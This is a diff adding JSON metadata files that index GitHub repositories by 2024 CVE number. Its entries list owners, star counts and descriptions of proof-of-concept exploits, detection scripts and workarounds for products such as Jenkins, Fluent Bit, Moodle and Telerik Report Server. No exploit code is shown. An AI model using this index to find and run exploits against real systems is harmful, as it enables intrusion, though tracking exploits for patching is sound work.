a/2024/CVE-2024-42845.json b/2024/CVE-2024-42845.json new file mode 100644 index 0000000000..5321d9e081 --- /dev/null +++ b/2024/CVE-2024-42845.json @@ -0,0 +1,36 @@ +[ + { + "id": 846570899, + "name": "invesalius3_vulnerabilities", + "full_name": "partywavesec\/invesalius3_vulnerabilities", + "owner": { + "login": "partywavesec", + "id": 98420665, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98420665?v=4", + "html_url": "https:\/\/github.com\/partywavesec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/partywavesec\/invesalius3_vulnerabilities", + "description": "InVesalius discovered CVE. CVE-2024-42845, CVE-2024-44825", + "fork": false, + "created_at": "2024-08-23T13:43:27Z", + "updated_at": "2024-11-28T14:31:34Z", + "pushed_at": "2024-11-28T14:31:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-42845", + "cve-2024-44825" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42849.json b/2024/CVE-2024-42849.json new file mode 100644 index 0000000000..79a5fd2791 --- /dev/null +++ b/2024/CVE-2024-42849.json @@ -0,0 +1,33 @@ +[ + { + "id": 843144280, + "name": "CVE-2024-42849", + "full_name": "njmbb8\/CVE-2024-42849", + "owner": { + "login": "njmbb8", + "id": 11412483, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11412483?v=4", + "html_url": "https:\/\/github.com\/njmbb8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/njmbb8\/CVE-2024-42849", + "description": "An issue in Silverpeas v.6.4.2 and lower allows a remote attacker to cause a denial of service via the password change function.", + "fork": false, + "created_at": "2024-08-15T21:57:29Z", + "updated_at": "2024-08-15T22:18:21Z", + "pushed_at": "2024-08-15T22:18:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42850.json b/2024/CVE-2024-42850.json new file mode 100644 index 0000000000..d0cfe760a9 --- /dev/null +++ b/2024/CVE-2024-42850.json @@ -0,0 +1,33 @@ +[ + { + "id": 843137855, + "name": "CVE-2024-42850", + "full_name": "njmbb8\/CVE-2024-42850", + "owner": { + "login": "njmbb8", + "id": 11412483, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11412483?v=4", + "html_url": "https:\/\/github.com\/njmbb8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/njmbb8\/CVE-2024-42850", + "description": "An issue in Silverpeas v6.4.2 and lower allows for the bypassing of password complexity requirements.", + "fork": false, + "created_at": "2024-08-15T21:32:29Z", + "updated_at": "2024-08-26T09:13:40Z", + "pushed_at": "2024-08-15T21:55:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42861.json b/2024/CVE-2024-42861.json new file mode 100644 index 0000000000..4475c1e102 --- /dev/null +++ b/2024/CVE-2024-42861.json @@ -0,0 +1,33 @@ +[ + { + "id": 860707248, + "name": "CVE-2024-42861", + "full_name": "qiupy123\/CVE-2024-42861", + "owner": { + "login": "qiupy123", + "id": 71477043, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71477043?v=4", + "html_url": "https:\/\/github.com\/qiupy123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qiupy123\/CVE-2024-42861", + "description": "the", + "fork": false, + "created_at": "2024-09-21T01:24:25Z", + "updated_at": "2024-09-21T02:21:53Z", + "pushed_at": "2024-09-21T02:21:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42919.json b/2024/CVE-2024-42919.json new file mode 100644 index 0000000000..81cdb0de6b --- /dev/null +++ b/2024/CVE-2024-42919.json @@ -0,0 +1,33 @@ +[ + { + "id": 844700853, + "name": "CVE-2024-42919", + "full_name": "jeyabalaji711\/CVE-2024-42919", + "owner": { + "login": "jeyabalaji711", + "id": 122691992, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122691992?v=4", + "html_url": "https:\/\/github.com\/jeyabalaji711", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jeyabalaji711\/CVE-2024-42919", + "description": null, + "fork": false, + "created_at": "2024-08-19T19:50:50Z", + "updated_at": "2024-08-19T20:41:07Z", + "pushed_at": "2024-08-19T20:40:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4295.json b/2024/CVE-2024-4295.json new file mode 100644 index 0000000000..f7b575ff75 --- /dev/null +++ b/2024/CVE-2024-4295.json @@ -0,0 +1,64 @@ +[ + { + "id": 810747489, + "name": "CVE-2024-4295-Poc", + "full_name": "truonghuuphuc\/CVE-2024-4295-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-4295-Poc", + "description": "CVE-2024-4295 Email Subscribers by Icegram Express <= 5.7.20 - Unauthenticated SQL Injection via hash", + "fork": false, + "created_at": "2024-06-05T09:29:20Z", + "updated_at": "2024-06-26T12:02:48Z", + "pushed_at": "2024-06-05T10:24:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815013929, + "name": "CVE-2024-4295-Poc", + "full_name": "cve-2024\/CVE-2024-4295-Poc", + "owner": { + "login": "cve-2024", + "id": 172750025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172750025?v=4", + "html_url": "https:\/\/github.com\/cve-2024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cve-2024\/CVE-2024-4295-Poc", + "description": null, + "fork": false, + "created_at": "2024-06-14T07:04:36Z", + "updated_at": "2024-06-14T07:06:24Z", + "pushed_at": "2024-06-14T07:06:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42992.json b/2024/CVE-2024-42992.json new file mode 100644 index 0000000000..37a0cb6d26 --- /dev/null +++ b/2024/CVE-2024-42992.json @@ -0,0 +1,33 @@ +[ + { + "id": 847526830, + "name": "CVE-2024-42992", + "full_name": "thanhh23\/CVE-2024-42992", + "owner": { + "login": "thanhh23", + "id": 82047405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82047405?v=4", + "html_url": "https:\/\/github.com\/thanhh23", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thanhh23\/CVE-2024-42992", + "description": "CVE-2024-42992", + "fork": false, + "created_at": "2024-08-26T03:13:45Z", + "updated_at": "2024-08-31T12:56:04Z", + "pushed_at": "2024-08-22T04:43:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43035.json b/2024/CVE-2024-43035.json new file mode 100644 index 0000000000..2d3daf66c2 --- /dev/null +++ b/2024/CVE-2024-43035.json @@ -0,0 +1,33 @@ +[ + { + "id": 845746668, + "name": "Fonoster-LFI-PoC", + "full_name": "ZeroPathAI\/Fonoster-LFI-PoC", + "owner": { + "login": "ZeroPathAI", + "id": 170791525, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170791525?v=4", + "html_url": "https:\/\/github.com\/ZeroPathAI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZeroPathAI\/Fonoster-LFI-PoC", + "description": "Proof-of-concept exploit for Fonoster LFI vulnerability (CVE-2024-43035)", + "fork": false, + "created_at": "2024-08-21T21:12:14Z", + "updated_at": "2024-08-23T21:43:10Z", + "pushed_at": "2024-08-23T21:42:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43044.json b/2024/CVE-2024-43044.json new file mode 100644 index 0000000000..a1752b18bf --- /dev/null +++ b/2024/CVE-2024-43044.json @@ -0,0 +1,130 @@ +[ + { + "id": 839739992, + "name": "CVE-2024-43044", + "full_name": "HwMex0\/CVE-2024-43044", + "owner": { + "login": "HwMex0", + "id": 102358575, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102358575?v=4", + "html_url": "https:\/\/github.com\/HwMex0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HwMex0\/CVE-2024-43044", + "description": "The script checks Jenkins endpoints for CVE-2024-43044 by retrieving the Jenkins version from the innstance and comparing it against known vulnerable version ranges.", + "fork": false, + "created_at": "2024-08-08T08:28:26Z", + "updated_at": "2024-11-20T16:31:00Z", + "pushed_at": "2024-08-08T09:32:00Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-43044", + "detection", + "jenkins" + ], + "visibility": "public", + "forks": 6, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 839823974, + "name": "SECURITY-3430", + "full_name": "jenkinsci-cert\/SECURITY-3430", + "owner": { + "login": "jenkinsci-cert", + "id": 9285726, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9285726?v=4", + "html_url": "https:\/\/github.com\/jenkinsci-cert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jenkinsci-cert\/SECURITY-3430", + "description": "This repository provides a workaround preventing exploitation of SECURITY-3430 \/ CVE-2024-43044", + "fork": false, + "created_at": "2024-08-08T11:55:32Z", + "updated_at": "2024-09-23T00:29:13Z", + "pushed_at": "2024-08-12T17:19:25Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 841861299, + "name": "CVE-2024-43044-POC", + "full_name": "v9d0g\/CVE-2024-43044-POC", + "owner": { + "login": "v9d0g", + "id": 139420834, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139420834?v=4", + "html_url": "https:\/\/github.com\/v9d0g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/v9d0g\/CVE-2024-43044-POC", + "description": "CVE-2024-43044的利用方式", + "fork": false, + "created_at": "2024-08-13T07:32:35Z", + "updated_at": "2024-10-16T01:14:36Z", + "pushed_at": "2024-08-13T07:43:22Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 846725221, + "name": "CVE-2024-43044-jenkins", + "full_name": "convisolabs\/CVE-2024-43044-jenkins", + "owner": { + "login": "convisolabs", + "id": 92468795, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92468795?v=4", + "html_url": "https:\/\/github.com\/convisolabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/convisolabs\/CVE-2024-43044-jenkins", + "description": "Exploit for the vulnerability CVE-2024-43044 in Jenkins", + "fork": false, + "created_at": "2024-08-23T20:26:26Z", + "updated_at": "2024-11-28T05:26:21Z", + "pushed_at": "2024-10-02T21:58:12Z", + "stargazers_count": 167, + "watchers_count": 167, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 167, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43160.json b/2024/CVE-2024-43160.json new file mode 100644 index 0000000000..a33c24ad9a --- /dev/null +++ b/2024/CVE-2024-43160.json @@ -0,0 +1,33 @@ +[ + { + "id": 858533589, + "name": "CVE-2024-43160", + "full_name": "KTN1990\/CVE-2024-43160", + "owner": { + "login": "KTN1990", + "id": 33407405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33407405?v=4", + "html_url": "https:\/\/github.com\/KTN1990", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KTN1990\/CVE-2024-43160", + "description": "The BerqWP – Automated All-In-One PageSpeed Optimization Plugin for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to arbitrary file uploads", + "fork": false, + "created_at": "2024-09-17T04:19:54Z", + "updated_at": "2024-10-21T13:18:16Z", + "pushed_at": "2024-09-17T04:30:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4320.json b/2024/CVE-2024-4320.json new file mode 100644 index 0000000000..0f720913ff --- /dev/null +++ b/2024/CVE-2024-4320.json @@ -0,0 +1,33 @@ +[ + { + "id": 839650605, + "name": "CVE-2024-4320", + "full_name": "bolkv\/CVE-2024-4320", + "owner": { + "login": "bolkv", + "id": 145219983, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145219983?v=4", + "html_url": "https:\/\/github.com\/bolkv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bolkv\/CVE-2024-4320", + "description": null, + "fork": false, + "created_at": "2024-08-08T03:54:38Z", + "updated_at": "2024-08-08T03:54:46Z", + "pushed_at": "2024-08-08T03:54:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4323.json b/2024/CVE-2024-4323.json new file mode 100644 index 0000000000..dda443ce80 --- /dev/null +++ b/2024/CVE-2024-4323.json @@ -0,0 +1,102 @@ +[ + { + "id": 803353937, + "name": "CVE-2024-4323-Exploit-POC", + "full_name": "skilfoy\/CVE-2024-4323-Exploit-POC", + "owner": { + "login": "skilfoy", + "id": 20802814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20802814?v=4", + "html_url": "https:\/\/github.com\/skilfoy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skilfoy\/CVE-2024-4323-Exploit-POC", + "description": "This proof-of-concept script demonstrates how to exploit CVE-2024-4323, a memory corruption vulnerability in Fluent Bit, enabling remote code execution.", + "fork": false, + "created_at": "2024-05-20T15:04:13Z", + "updated_at": "2024-10-31T09:51:11Z", + "pushed_at": "2024-05-20T15:28:07Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-4323", + "cve-2024-4323-exploit-poc", + "exploit", + "exploit-poc", + "fluent-bit", + "rce-exploit" + ], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803825364, + "name": "CVE-2024-4323", + "full_name": "d0rb\/CVE-2024-4323", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-4323", + "description": "Critical heap buffer overflow vulnerability in the handle_trace_request and parse_trace_request functions of the Fluent Bit HTTP server.", + "fork": false, + "created_at": "2024-05-21T12:59:16Z", + "updated_at": "2024-09-18T15:30:15Z", + "pushed_at": "2024-05-21T13:15:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804283459, + "name": "CVE-2024-4323-dos_poc", + "full_name": "yuansec\/CVE-2024-4323-dos_poc", + "owner": { + "login": "yuansec", + "id": 18318654, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18318654?v=4", + "html_url": "https:\/\/github.com\/yuansec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuansec\/CVE-2024-4323-dos_poc", + "description": null, + "fork": false, + "created_at": "2024-05-22T09:55:30Z", + "updated_at": "2024-05-22T10:13:52Z", + "pushed_at": "2024-05-22T10:13:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43363.json b/2024/CVE-2024-43363.json new file mode 100644 index 0000000000..5c23e55ac1 --- /dev/null +++ b/2024/CVE-2024-43363.json @@ -0,0 +1,33 @@ +[ + { + "id": 869211393, + "name": "CVE-2024-43363", + "full_name": "p33d\/CVE-2024-43363", + "owner": { + "login": "p33d", + "id": 123099747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123099747?v=4", + "html_url": "https:\/\/github.com\/p33d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p33d\/CVE-2024-43363", + "description": null, + "fork": false, + "created_at": "2024-10-07T22:59:09Z", + "updated_at": "2024-11-20T16:31:06Z", + "pushed_at": "2024-10-07T22:59:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43416.json b/2024/CVE-2024-43416.json new file mode 100644 index 0000000000..dc85e7557d --- /dev/null +++ b/2024/CVE-2024-43416.json @@ -0,0 +1,33 @@ +[ + { + "id": 890570505, + "name": "CVE-2024-43416-PoC", + "full_name": "0xmupa\/CVE-2024-43416-PoC", + "owner": { + "login": "0xmupa", + "id": 61334200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61334200?v=4", + "html_url": "https:\/\/github.com\/0xmupa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xmupa\/CVE-2024-43416-PoC", + "description": null, + "fork": false, + "created_at": "2024-11-18T19:58:42Z", + "updated_at": "2024-11-18T19:59:37Z", + "pushed_at": "2024-11-18T19:59:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43425.json b/2024/CVE-2024-43425.json new file mode 100644 index 0000000000..bacd449f25 --- /dev/null +++ b/2024/CVE-2024-43425.json @@ -0,0 +1,33 @@ +[ + { + "id": 846465649, + "name": "moodle-rce-calculatedquestions", + "full_name": "RedTeamPentesting\/moodle-rce-calculatedquestions", + "owner": { + "login": "RedTeamPentesting", + "id": 34096076, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34096076?v=4", + "html_url": "https:\/\/github.com\/RedTeamPentesting", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RedTeamPentesting\/moodle-rce-calculatedquestions", + "description": "Scripts for Analysis of a RCE in Moodle Calculated Questions (CVE-2024-43425)", + "fork": false, + "created_at": "2024-08-23T09:13:03Z", + "updated_at": "2024-11-07T20:51:43Z", + "pushed_at": "2024-08-23T09:36:55Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4351.json b/2024/CVE-2024-4351.json new file mode 100644 index 0000000000..a8e5c07ed6 --- /dev/null +++ b/2024/CVE-2024-4351.json @@ -0,0 +1,33 @@ +[ + { + "id": 890044743, + "name": "CVE-2024-4351", + "full_name": "ZSECURE\/CVE-2024-4351", + "owner": { + "login": "ZSECURE", + "id": 46941177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46941177?v=4", + "html_url": "https:\/\/github.com\/ZSECURE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZSECURE\/CVE-2024-4351", + "description": null, + "fork": false, + "created_at": "2024-11-17T21:37:55Z", + "updated_at": "2024-11-17T21:39:06Z", + "pushed_at": "2024-11-17T21:39:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4352.json b/2024/CVE-2024-4352.json new file mode 100644 index 0000000000..ced5d9072f --- /dev/null +++ b/2024/CVE-2024-4352.json @@ -0,0 +1,33 @@ +[ + { + "id": 801605479, + "name": "CVE-2024-4352-Poc", + "full_name": "truonghuuphuc\/CVE-2024-4352-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-4352-Poc", + "description": "CVE-2024-4352 Tutor LMS Pro <= 2.7.0 - Missing Authorization to SQL Injection", + "fork": false, + "created_at": "2024-05-16T14:55:43Z", + "updated_at": "2024-06-26T12:03:39Z", + "pushed_at": "2024-05-17T08:03:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-43532.json b/2024/CVE-2024-43532.json new file mode 100644 index 0000000000..85ce647ea7 --- /dev/null +++ b/2024/CVE-2024-43532.json @@ -0,0 +1,33 @@ +[ + { + "id": 889024932, + "name": "CVE-2024-43532", + "full_name": "expl0itsecurity\/CVE-2024-43532", + "owner": { + "login": "expl0itsecurity", + "id": 185355311, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/185355311?v=4", + "html_url": "https:\/\/github.com\/expl0itsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/expl0itsecurity\/CVE-2024-43532", + "description": null, + "fork": false, + "created_at": "2024-11-15T13:15:39Z", + "updated_at": "2024-11-19T19:03:13Z", + "pushed_at": "2024-11-15T13:19:13Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4358.json b/2024/CVE-2024-4358.json new file mode 100644 index 0000000000..0cc7402add --- /dev/null +++ b/2024/CVE-2024-4358.json @@ -0,0 +1,193 @@ +[ + { + "id": 809672691, + "name": "CVE-2024-4358", + "full_name": "sinsinology\/CVE-2024-4358", + "owner": { + "login": "sinsinology", + "id": 77316200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4", + "html_url": "https:\/\/github.com\/sinsinology", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinsinology\/CVE-2024-4358", + "description": "Progress Telerik Report Server pre-authenticated RCE chain (CVE-2024-4358\/CVE-2024-1800)", + "fork": false, + "created_at": "2024-06-03T08:22:10Z", + "updated_at": "2024-11-23T16:47:45Z", + "pushed_at": "2024-06-06T16:18:08Z", + "stargazers_count": 73, + "watchers_count": 73, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 73, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810273513, + "name": "CVE-2024-4358", + "full_name": "RevoltSecurities\/CVE-2024-4358", + "owner": { + "login": "RevoltSecurities", + "id": 119435129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4", + "html_url": "https:\/\/github.com\/RevoltSecurities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2024-4358", + "description": "An Vulnerability detection and Exploitation tool for CVE-2024-4358", + "fork": false, + "created_at": "2024-06-04T11:32:59Z", + "updated_at": "2024-11-05T01:52:36Z", + "pushed_at": "2024-06-04T11:41:27Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810399215, + "name": "CVE-2024-4358", + "full_name": "Harydhk7\/CVE-2024-4358", + "owner": { + "login": "Harydhk7", + "id": 148646710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148646710?v=4", + "html_url": "https:\/\/github.com\/Harydhk7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Harydhk7\/CVE-2024-4358", + "description": null, + "fork": false, + "created_at": "2024-06-04T16:07:36Z", + "updated_at": "2024-06-04T16:23:17Z", + "pushed_at": "2024-06-04T16:23:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810576909, + "name": "CVE-2024-4358_Mass_Exploit", + "full_name": "Sk1dr0wz\/CVE-2024-4358_Mass_Exploit", + "owner": { + "login": "Sk1dr0wz", + "id": 108571358, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108571358?v=4", + "html_url": "https:\/\/github.com\/Sk1dr0wz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sk1dr0wz\/CVE-2024-4358_Mass_Exploit", + "description": null, + "fork": false, + "created_at": "2024-06-05T01:05:12Z", + "updated_at": "2024-09-26T10:33:44Z", + "pushed_at": "2024-06-05T11:28:40Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 23, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812526267, + "name": "CVE-2024-4358", + "full_name": "verylazytech\/CVE-2024-4358", + "owner": { + "login": "verylazytech", + "id": 172168670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168670?v=4", + "html_url": "https:\/\/github.com\/verylazytech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/verylazytech\/CVE-2024-4358", + "description": "Authentication Bypass Vulnerability — CVE-2024–4358 — Telerik Report Server 2024", + "fork": false, + "created_at": "2024-06-09T06:30:06Z", + "updated_at": "2024-11-26T21:34:46Z", + "pushed_at": "2024-11-26T14:46:07Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authentication-bypass", + "cve-2024-4358", + "poc-cve-2024-4358", + "telerik-report-server" + ], + "visibility": "public", + "forks": 4, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 846915417, + "name": 